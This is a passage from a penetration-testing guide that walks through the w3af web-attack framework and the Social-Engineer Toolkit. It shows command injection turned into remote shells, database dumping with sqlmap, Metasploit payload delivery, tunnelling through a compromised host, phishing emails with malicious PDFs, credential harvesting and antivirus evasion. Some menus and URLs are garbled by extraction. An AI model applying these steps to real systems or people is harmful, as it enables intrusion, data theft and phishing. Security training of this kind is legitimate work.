htmlFile output plugins, both will log a vulnerability found by an audit plugin.
Complex sites
Some sites use embedded objects, like macromedia flash and java applets,
that
the browser renders to the user. Because of the inability of the framework to
get
any information out of those objects, a script called spiderMan was created.
This
script will run a HTTP proxy so the user can navigate the target site through
it;
during this process the plugin will extract information from the requests and
responses.
A simple example will clarify things, let's suppose that w3af is auditing a site
and
can't find any links on the main page. After a closer interpretation of the
results
by the user, it is clear that the main page has a java applet menu where all
the
other sections are linked. The user runs w3af once again and now activates
the
spiderMan plugin, navigates the site manually using the browser and the
spiderman proxy. When the user has finished his browsing, w3af will continue
with
all the hard auditing work.
The spiderMan plugin can be used when javascript, flash, java applets or any
other browser side technology is present.
This is a sample spiderMan plugin run:
w3af>>> plugins
w3af/plugins>>> discovery spiderMan
w3af>>> target
w3af/target>>> set target http://localhost/w3af/fileUpload/
w3af/target>>> back
w3af>>> start
spiderMan proxy is running on 127.0.0.1:44444 .
Please configure your browser to use these proxy settings and
navigate the target site. To exit spiderMan plugin please
navigate to http://127.7.7.7/spiderMan?terminate .
Now the user configures the browser to use the 127.0.0.1:44444 proxy and
navigates the target site, after that he navigates to
http://127.7.7.7/spiderMan?
terminate and exits the spiderMan. The results are shown:
New URL found by discovery: http://localhost/w3af/test
New URL found by discovery: http://localhost/favicon.ico
New URL found by discovery: http://localhost/w3af/
New URL found by discovery: http://localhost/w3af/img/w3af.png
New URL found by discovery: http://localhost/w3af/xssforms/
testforms.
html
New URL found by discovery: http://localhost/w3af/xssforms/
dataReceptor.php
http://
localhost/w3af/fileUpload/
http://
localhost/w3af/test
http://
localhost/w3af/xssforms/
dataReceptor.php
http://
localhost/w3af/
http://
localhost/w3af/img/w3af.png
http://
testforms.
html
http://
localhost/w3af/fileUpload/uploader.php
http://
localhost/favicon.ico
http://
localhost/w3af/fileUpload/ | Method: GET
http://
localhost/w3af/fileUpload/uploader.php | Method: POST |
Parameters: (MAX_FILE_SIZE,uploadedfile)
http://
localhost/w3af/test | Method: GET
http://
localhost/favicon.ico | Method: GET
http://
localhost/w3af/ | Method: GET
http://
localhost/w3af/img/w3af.png | Method: GET
http://
testforms.
html | Method: GET
http://
dataReceptor.php | Method:
POST | Parameters: (user,firstname)
Starting sqli plugin execution.
w3af>>>
Exploiting
Two ways of exploiting a vulnerability exist, the first one uses the
vulnerabilities
found by the audit phase and the second one, which is called fastextploit,
requires
the user to enter the vulnerability parameters.
Let's see an example of the first way of exploiting a vulnerability with w3af:
w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target
w3af/config:target>>>back
w3af>>>start
The list of URLs is:
http://
localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
http://
localhost/w3af/osCommanding/vulnerable.php | Method:
GET | Parameters: (command)
OS Commanding was found at: "http://localhost/w3af/osCommanding/
vulnerable.php", using HTTP method GET. The sent data was:
"command=+ping+c+
9+localhost". The vulnerability was found in
the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
Vulnerability successfully exploited. This is a list of
available shells:
[
0] <osCommandingShell object (ruser: "wwwdata"
| rsystem:
"Linux brick 2.6.2419generic
i686 GNU/Linux")>
Please use the interact command to interact with the shell

objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell.
Commands typed in this menu will be runned on the remote web
server.
ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
endInteraction
w3af/exploit>>>back
w3af>>>
The second way is to use fastexploit. This method should be used when the
user
has found a vulnerability manually and wants to exploit it using the
framework.
Here is an example of a fastexploit run:
w3af>>> exploit
w3af/exploit>>> exploit config sqlmap
w3af/plugin/sqlmap>>> set url
http://localhost/w3af/blindSqli/blindSqliinteger.
php
w3af/plugin/sqlmap>>> set injvar id
w3af/plugin/sqlmap>>> set data id=1
w3af/plugin/sqlmap>>> back
w3af/exploit>>> fastexploit sqlmap
sqlmap coded by inquis <bernardo.damele@gmail.com> and belch
<daniele.bellucci@gmail.com>
SQL injection could be verified, trying to create the DB driver.
Execute "exitPlugin" to get out of the remote shell. Commands
typed in this menu will be runned on the remote web server.
w3af/exploit/sqlmap>>> dump agenda w3af_test
Database: w3af_test
Table: agenda
[2 entries]
++
+
+
+
+
| direccion | id | nombre | telefono | email |
++
+
+
+
+
| direccion 123 | 1 | apr | 52365786 | acho@c.com |
| direccion 333 | 2 | vico | 47998123 | vTro@c.com |
++
+
+
+
+
w3af/exploit/sqlmap>>>
Advanced exploiting techniques

The framework implements two highly advanced exploiting techniques that
allow
the user to keep escalating privileges into the remote network. Both of this
techniques are used once the framework is able to execute remote operating
system commands, this is the case of (for example) osCommanding,
remoteFileIncludeShell and davShell attack plugins. These exploiting
techniques
are:
Virtual daemon, allows you to use metasploit payloads to exploit the server
that supports a vulnerable web application.
w3afAgent, which creates a tunnel between the compromised server and
w3af, the allow the user to route TCP connections through the remote
server.
Both of them are simple to use and configure using this guide. These
features are
under heavy development and are under no means stable, use them at your
on
risk.
Virtual daemon
As said before, this feature allows you to use metasploit payloads to exploit
the
server that supports a vulnerable web application. To use this feature you
must
have a working installation of the metasploit framework version 3.0 or
greater;
you can get it for free at www.metasploit.com , the installation and
configuration
of MSF is out of the scope of this document.
To be able to use the virtual daemon you will need to run the following
command
in order to copy the w3af metasploit module into the MSF directory:
./w3af_console i
/home/jdoe/tools/msf/
Where /home/jdoe/tools/msf/ is the directory where the user jdoe
installed
Metasploit. In case you are interested, this is just a fancy shortcut for cp
core/controllers/vdaemon/w3af_vdaemon.rb
/home/user/tools/msf/modules/exploits/unix/misc/. Once this has been
done, the user can start using the virtual daemon feature, before going
through
an example to see how to use the feature, we will make a summary of the
steps
that will happened during the exploitation:
1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the virtual daemon
3. The user starts the metasploit framework
4. The user configures the w3af module inside MSF and executes it
5. w3af module inside MSF will connect to the virtual daemon that is listening
on localhost
6. MSF will send the payload selected by the user to the virtual daemon
7. The virtual daemon will create a PE(portable executable) or an
ELF(executable and linkable format) file depending on the remote operating
system, and using the exploited vulnerability it will upload and execute the
payload in the remote server
8. The process of uploading the file to the remote server depends on the
remote operating system, the privileges of the user running w3af and the
local operating system; but in most cases the following happends:
w3af sends a small executable to the remote server to perform an
extrusion scan.
w3af sniffs on the configured interface ( misc-settings -> interface )
for packets that arrive on the expected ports in order to verify
outgoing firewall rules on the remote network
If a TCP port is found to be allowed in the remote firewall, w3af will try
to run a server on that port and make a reverse connection from the
compromised host in order to download the PE/ELF generated file. If
no TCP ports are enabled, w3af will send the ELF/PE file to the remote
server using several calls to the echo command, which is rather
slow, but should always work because it's an in-band transfer method.
9. The payload runs in the remote server and possibly connects back to the
metasploit framework, that will handle the rest of the exploitation.
Now that we know the theory, let's see an example of what this feature can
do:
$ ./w3af_console
w3af>>> plugins
w3af>>> plugins
w3af/plugins>>> audit osCommanding
Enabled audit plugins:
osCommanding
w3af>>> target
w3af/target>>> set target http://172.16.1.128/os.php?cmd=f00
w3af/target>>> back
w3af>>> start
http://
172.16.1.128/os.php
http://
172.16.1.128/os.php | Method: GET | Parameters: (cmd)
OS Commanding was found at: http://172.16.1.128/os.php . Using
method: GET. The data sent was: cmd=type+%25SYSTEMROOT
%25%5Cwin.ini The vulnerability was found in the request with id
7.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
Vulnerability successfully exploited.
w3af/exploit/osCommandingShell>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's
w3af_vdaemon module to exploit it.
w3af/exploit/osCommandingShell>>>
Nothing special for now, just added the new start vdaemon command. With
this w3af run we have covered items 1. and 2. of the theory. The next step is
to
configure the MSF module and run it; my preferred way is to use metasploit's
web
interface msfweb. The first step is to click on the Exploit button on the
main
menu, a small window will appear, there you should search for w3af and then
select the exploit named: w3af virtual daemon exploit. Some important
points
to have in mind while configuring the w3af agent virtual daemon module
inside
MSF:
The target is of course the remote operating system you are exploiting
VNC payloads don't seem to work
RHOST parameter indicates the IP address of the server you are exploiting
LHOST is your public IP address
LPORT is a port where the remote web server can connect to (when using
reverse connect payloads) or you can connect to ( when using bind
payloads )
The w3af module inside metasploit will connect to localhost:9091 and do
all
the payload transfer, this parameters can't be configured and must not be
confused with RHOST/LHOST and LPORT
Once it has been configured, we can click on Launch Exploit to start the
process, this is what we will see in the w3af console:
w3af/exploit/osCommandingShell>>>
Please wait some seconds while w3af performs an extrusion scan.
The extrusion test failed, no reverse connect transfer methods
can be used. Trying inband echo transfer method.
Error: The user running w3af can't sniff on the specified
interface. Hints: Are you root? Does this interface exist?
Successfully transfered the MSF payload to the remote server.
Successfully executed the MSF payload on the remote server.
The last messages are printed when you run w3af as a normal user, the
reason is
simple, when you run w3af as a user you can't sniff and therefore can't
perform a
successful extrusion scan. A successful extrusion scan would look like:
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these
ports:
25/
TCP
80/
TCP
53/
TCP
1433/
TCP
8080/
TCP
53/
UDP
69/
UDP
139/
UDP
1025/
UDP
The following ports are not bound to a local process and can be
used by w3af:
25/
TCP
53/
TCP
1433/
TCP
8080/
TCP
Selecting port "8080/TCP" for inbound connections from the
compromised server to w3af.
And if we take a look at the metasploit web interface we will find something
far
more interesting:
[*] The remote IP address is: 172.16.1.128
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to
complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8
seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to
execute payload).
[*] The session could start before the handler, so please *be
patient*.
[*] Command shell session 1 opened (172.16.1.1:4444 >
172.16.1.128:1047)
[*] Done waiting!
[*] Starting handler
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 19852000
Microsoft Corp.
C:\WINNT\system32>
Now the user has an interactive shell with the privileges of the user running
the
web server, that can be used without any restrictions, you could even close
w3af
now and continue working directly from the metasploit shell.
w3afAgent
As said before, this feature allows you to create a reverse tunnel that will
route
TCP connections through the compromised server. Unlike virtual daemon,
these
feature is ready to use and doesn't require any other software. Before going
through an example to see how to use this feature, we will make a summary
of
the steps that will happened during exploitation:
1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the w3afAgent
3. w3af performs an extrusion scan by sending a small executable to the
remote server. This executable connects back to w3af and allows the
framework to identify outgoing firewall rules on the remote network.
4. w3afAgent Manager will send a w3afAgentClient to the remote server. The
process of uploading the file to the remote server depends on the remote
operating system, the privileges of the user running w3af and the local
operating system; but in most cases the following happends:
w3af reuses the information from the first extrusion scan, which was
performed in step 3 in order to know which port it can use to listen for
connections from the compromised server.
If a TCP port is found to be allowed in the remote firewall, w3af will try
to run a server on that port and make a reverse connection from the
compromised in order to download the PE/ELF generated file. If no TCP
ports are enabled, w3af will send the ELF/PE file to the remote server
using several calls to the echo command, which is rather slow, but
should always work because it's an in-band transfer method.
5. w3afAgent Manager starts the w3afAgentServer that will bind on
localhost:1080 (which will be used by the w3af user) and on the interface
configured in w3af ( misc-settings->interface ) on the port discovered
during step 3.
6. The w3afAgentClient connects back to the w3afAgentServer, successfully

creating the tunnel
7. The user configures the proxy listening on localhost:1080 on his preferred
software
8. When the program connects to the socks proxy, all outgoing connections
are routed through the compromised server
Now that we know the theory, let's see an example of what this feature can
do:
$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> audit osCommanding
Enabled audit plugins:
osCommanding
w3af>>> target
w3af/target>>> set target http://172.10.10.1/w3af/v.php?c=list
w3af/target>>> back
w3af>>> start
http://
172.10.10.1/w3af/v.php
http://
172.10.10.1/w3af/v.php | Method: GET | Parameters: (c)
OS Commanding was found at: http://172.10.10.1/w3af/v.php .
Using method: GET. The data sent was: c=%2Fbin%2Fcat+%2Fetc
%2Fpasswd The vulnerability was found in the request with id 2.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
Vulnerability successfully exploited.
Nothing really new until now, we configured w3af, started the scan and
exploited
the vulnerability.
w3af/exploit/osCommandingShell>>> start w3afAgent

Initializing w3afAgent system, please wait.
The extrusion scan failed.
Error: The user running w3af can't sniff on the specified
interface. Hints: Are you root? Does this interface exist?
Using inbound port "5060" without knowing if the remote host
will be able to connect back.
The last messages are printed when you run w3af as a normal user, the
reason is
simple, when you run w3af as a user you can't sniff and therefor can't
perform a
successful extrusion scan. A successful extrusion scan would look like:
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these
ports:
25/
TCP
80/
TCP
53/
TCP
1433/
TCP
8080/
TCP
53/
UDP
69/
UDP
139/
UDP
1025/
UDP
The following ports are not bound to a local process and can be
used by w3af:
25/
TCP
53/
TCP
1433/
TCP
8080/
TCP
Selecting port "8080/TCP" for inbound connections from the
compromised server to w3af.
In both cases (superuser and user), these should be the following steps:
Starting w3afAgentClient upload.
Finished w3afAgentClient upload.
Please wait 30 seconds for w3afAgentClient execution.
w3afAgent service is up and running.
You may start using the w3afAgent that is listening on port
1080. All connections made through this SOCKS daemon will be
relayed using the compromised server.
And now, from another console we can use a socksClient to route
connections
through the compromised server:
$ nc 172.10.10.1 22
(UNKNOWN) [172.10.10.1] 22 (ssh) : Connection refused
$ python socksClient.py 127.0.0.1 22
SSH2.0OpenSSH_
4.3p2 Debian8ubuntu1
Protocol mismatch.
$ cat socksClient.py
import extlib.socksipy.socks as socks
import sys
s = socks.socksocket()
s.setproxy(socks.PROXY_TYPE_SOCKS4,"localhost")
s.connect((sys.argv[1],int(sys.argv[2])))
s.send('\n')
print s.recv(1024)
I think this have given you an overview of a framework which is as

handy as burp suite.
It is to be mentioned that in the section I would mear Mr. Andres
Riancho.
Chapter 4:Social Engineering Tools

The Social-Engineer Toolkit (SET) is specifically designed to
perform advanced attacks against the human element. SET was
designed to be released with the http://www.socialengineer.org launch and has quickly became a standard tool in a
penetration testers arsenal. SET was written by David Kennedy
(ReL1K) and with a lot of help from the community it has
incorporated attacks never before seen in an exploitation toolset.
The attacks built into the toolkit are designed to be targeted and
focused attacks against a person or organization used during a
penetration test.
Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. SET by default works perfect for most people
however, advanced customization may be needed in order to ensure that the attack vectors
go off without a hitch. First thing to do is ensure that you have updated SET, from the
directory:
root@bt:/pentest/exploits/SET# svn update
U
src/payloadgen/payloadgen.py
U
src/java_applet/Java.java
U
src/java_applet/jar_file.py
U
src/web_clone/cloner.py
U
src/msf_attacks/create_payload.py
U
src/harvester/scraper.py
U
src/html/clientside/gen_payload.py
U
src/html/web_server.py
U
src/arp_cache/arp_cache.py
U
set
U
readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#
Once youve updated to the latest version, start tweaking your attack by editing the SET
configuration file. Lets walk through each of the flags:
Once youve updated to the latest version, start tweaking your attack by editing the SET
configuration file. Lets walk through each of the flags:
root@bt:/pentest/exploits/set# nano config/set_config
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
Looking through the configuration options, you can change specific fields to get a desired
result. In the first option, you can change the path of where the location of Metasploit is.
Metasploit is used for the payload creations, file format bugs, and for the browser exploit
sections.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL
DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
The Ettercap section can be used when youre on the same subnet as the victims and you
want to perform DNS poison attacks against a subset of IP addresses. When this flag is set
to ON, it will poison the entire local subnet and redirect a specific site or all sites to your
malicious server running.
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES

SENDMAIL=OFF
Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email
addresses. This attack only works if the victims SMTP server does not perform reverse
lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is
installed by default.
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK

WEBATTACK_EMAIL=OFF
When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the
victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only
available through the spear-phishing menu however when this is enabled it will add
additional functionality for you to be able to email victims with links to help better your
attacks.
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU
TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sunjava6-jdk
SELF_SIGNED_APPLET=OFF
The Java Applet Attack vector is the attack with one of the highest rates of success that
SET has in its arsenal. To make the attack look more believable, you can turn this flag on
which will allow you to sign the Java Applet with whatever name you want. Say your
targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the
applet with CompanyX to make it look more believable. This will require you to install javas
jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU
WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
The AUTO_DETECT flag is probably one of the most asked questions in SET. In most
cases, SET will grab the interface you use in order to connect out to the Internet and use
that as the reverse connection and IP address. Most attacks need to be customized and
may not be on the internal network. If you turn this flag to OFF, SET will prompt you with
additional questions on setting up the attack. This flag should be used when you want to
use multiple interfaces, have an external IP, or youre in a NAT/Port forwarding scenario.
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET
ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
By default the SET web server listens on port 80, if for some reason you need to change
this, you can specify an alternative port.
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER
AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN
EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary
When using the payload encoding options of SET, the best option for Anti-Virus bypass is
the backdoored, or loaded with a malicious payload hidden in the exe, executable option.
Specifically an exe is backdoored with a Metasploit based payload and can generally evade
most AVs out there. SET has an executable built into it for the backdooring of the exe
however if for some reason you want to use a different executable, you can specify the path
to that exe with the CUSTOM_EXE flag.
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED
OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
The web server utilized within SET is a custom-coded web server that at times can be
somewhat slow based off of the needs. If you find that you need a boost and want to utilize
Apache, you can flip this switch to ON and it will use Apache to handle the web requests
and speed your attack up. Note that this attack only works with the Java Applet and
Metasploit based attacks. Based on the interception of credentials, Apache cannot be used
with the web jacking, tabnabbing, or credential harvester attack methods.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK
VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR
(REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN
ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
In some cases when your performing an advanced social-engineer attack you may want to
register a domain and buy an SSL cert that makes the attack more believable. You can
incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to
ON. If you want to use self-signed certificates you can as well however there will be an
untrusted warning when a victim goes to your website.
TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A
LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds

WEBJACKING_TIME=2000
The webjacking attack is performed by replacing the victims browser with another window
that is made to look and appear to be a legitimate site. This attack is very dependant on
timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds)
otherwise if your internal, 2000 (2 seconds) is probably a safe bet.
SETs Menu
SET is a menu driven based attack system, which is fairly unique when it comes to hacker
tools. The decision not to make it command line was made because of how social-engineer
attacks occur; it requires multiple scenarios, options, and customizations. If the tool had
been command line based it would have really limited the effectiveness of the attacks and
the inability to fully customize it based on your target. Lets dive into the menu and do a brief
walkthrough of each attack vector.
root@bt:/pentest/exploits/set# ./set
[---]
[---]
[---]
[---]
[---]
[---]
[---]
[---]
[---]
The Social-Engineer Toolkit (SET)

Written by David Kennedy (ReL1K)
Version: 0.7
Codename: 'Swagger Wagon'
Report bugs to: davek@social-engineer.org
Java Applet Written by: Thomas Werth
Homepage: http://www.secmaniac.com
Framework: http://www.social-engineer.org
Over 1 million downloads and counting.
Welcome to the Social-Engineer Toolkit (SET). Your one

stop shop for all of your social-engineering needs..
[---]
[---]
[---]
[---]
[---]
[---]
[---]
[---]
[---]
Follow me on Twitter: dave_rel1k

DerbyCon 2011 Sep29-Oct02 - A new era begins...
irc.freenode.net - #DerbyCon - http://www.derbycon.com
Select from the menu:
1.
2.
Spear-Phishing Attack Vectors

Website Attack Vectors
3.
4.
5.
6.
7
8.
9.
10.
Infectious Media Generator

Create a Payload and Listener
Mass Mailer Attack
Teensy USB HID Attack Vector
Update the Metasploit Framework
Update the Social-Engineer Toolkit
Help, Credits, and About
Exit the Social-Engineer Toolkit
Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows
you to specially craft email messages and send them to a large
(or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure
"Sendmail" is installed (it is installed in BT4) and change
the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting
SET do everything for you (option 1), the second is to create
your own FileFormat payload and use it in your own attack. Either
way, good luck and enjoy!
1.
2.
3.
4.
Perform a Mass Email Attack

Create a FileFormat Payload
Create a Social-Engineering Template
Return to Main Menu
Enter your choice:
The spear-phishing attack menu is used for performing targeted email attacks against a
victim. You can send multiple emails based on what your harvested or you can send it to
individuals. You can also utilize fileformat (for example a PDF bug) and send the malicious
attack to the victim in order to hopefully compromise the system.
1.
2.
3.
4.
5.
6.
7

Mass Mailer Attack
8. Update the Social-Engineer Toolkit

9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing
multiple web-based attacks in order to compromise the intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and deliver a Metasploit
based payload. Uses a customized java applet created by Thomas Werth to
deliver
the payload.
The Metasploit browser exploit method will utilize select Metasploit browser
exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester Method will utilize web cloning of a website that has
a username and password field and harvest all the information posted to the
website.
The TabNabbing Method will wait for a user to move to a different tab, then
refresh the page to something different.
The Man Left in the Middle Attack Method was introduced
HTTP REFERER's in order to intercept fields and harvest
need to have an already vulnerable site and incorporate
src="http://YOURIP/">.
This could either be from a compromised site or through
by Kos and utilizes

data from them. You
<script
XSS.
The web jacking attack method was introduced by white_sheep, Emgent and the
Back|Track team. This method utilizes iframe replacements to make the
highlighted
URL link to appear legitimate however when clicked a window pops up then is
replaced with the malicious link. You can edit the link replacement settings
in
the set_config if its to slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu.
For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at
once
to see which is successful.
1.
2.
3.
4.
5.
6.
7.
8.
The Java Applet Attack Method

The Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Method
Return to the previous menu
Enter your choice (press enter for default):
The web attack vector is used by performing phishing attacks against the victim in hopes
they click the link. There is a wide-variety of attacks that can occur once they click. We will
dive into each one of the attacks later on.
3.
The infectious USB/DVD creator will develop a Metasploit based payload for you and craft
an autorun.inf file that once burned or placed on a USB will trigger an autorun feature and
hopefully compromise the system. This attack vector is relatively simple in nature and relies
on deploying the devices to the physical system.
4.
The create payload and listener is an extremely simple wrapper around Metasploit to create
a payload, export the exe for you and generate a listener. You would need to transfer the
exe onto the victim machine and execute it in order for it to properly work.
5.
Mass Mailer Attack
The mass mailer attack will allow you to send multiple emails to victims and customize the
messages. This option does not allow you to create payloads, so it is generally used to
perform a mass phishing attack.
1.
2.
3.
4.
5.
6.
7
8.
9.
10.

Mass Mailer Attack

Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystrokedongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Select a payload to create the pde file to import into Arduino:
1.
2.
3.
4.
Powershell HTTP GET MSF Payload

WSCRIPT HTTP GET MSF Payload
Powershell based Reverse Shell
Return to the main menu.
Enter your choice:
The teensy USB HID attack is a method used by purchasing a hardware based device from
prjc.com and programming it in a manner that makes the small USB microcontroller to look
and feel exactly like a keyboard. The important part with this is it bypasses autorun
capabilities and can drop payloads onto the system through the onboard flash memory. The
keyboard simulation allows you to type characters in a manner that can utilize downloaders
and exploit the system.
7
8.
9.
10.

The following menus will perform updates on Metasploit, the Social-Engineer Toolkit,
provide help and credits, and lastly exit the Social-Engineer Toolkit (why would you ever
want to do that?!).
Attack Vectors
Spear-Phishing Attack Vector
As mentioned previously, the spear phishing attack vector can be used to send targeted
emails with malicious attachments. In this example we are going to craft an attack, integrate
into GMAIL and send a malicious PDF to the victim. One thing to note is you can create and
save your own templates to use for future SE attacks or you can use pre-built ones. When
using SET just to note that when hitting enter for defaults, it will always be port 443 as the
reverse connection back and a reverse Meterpreter.
1.
2.
3.
4.
5.
6.

Mass Mailer Attack
7
8.
9.
10.


Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1.
2.
3.
4.
Perform a Mass Email Attack

Create a FileFormat Payload
Create a Social-Engineering Template
Return to Main Menu

Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1.
2.
3.
4.
5.
6.
7.
8.
9.
Adobe CoolType SING Table 'uniqueName' Overflow (0day)

Adobe Flash Player 'newfunction' Invalid Pointer Use
Adobe Collab.collectEmailInfo Buffer Overflow
Adobe Collab.getIcon Buffer Overflow
Adobe JBIG2Decode Memory Corruption Exploit
Adobe PDF Embedded EXE Social Engineering
Adobe util.printf() Buffer Overflow
Custom EXE to VBA (sent via RAR) (RAR required)
Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
Enter the number you want (press enter for default): 1

1.
2.
3.
4.
5.
Windows
Windows
Windows
Windows
Windows
Reverse TCP
Meterpreter
Reverse VNC
Reverse TCP
Meterpreter
Shell
Reverse_TCP
Shell (x64)
Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your

attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Do you want to use a predefined template or craft a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Below is a list of available templates:
1:
2:
3:
4:
5:
6:
7:
Baby Pics
Strange Internet usage from your computer
New Update
LOL...have to check this out...
Dan Brown's Angels & Demons
Computer Issue
Status Report
Enter the number you want to use: 7

Enter who you want to send email to: kennedyd013@gmail.com
What option do you want to use?
